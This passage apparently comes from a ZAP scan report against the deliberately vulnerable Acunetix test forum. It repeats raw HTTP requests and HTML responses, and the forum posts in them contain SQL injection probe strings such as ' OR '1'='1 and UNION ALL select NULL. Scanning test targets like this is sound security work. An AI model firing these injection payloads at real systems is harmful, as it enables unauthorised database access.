follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4149 |
| Response Body - size: 4,149 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
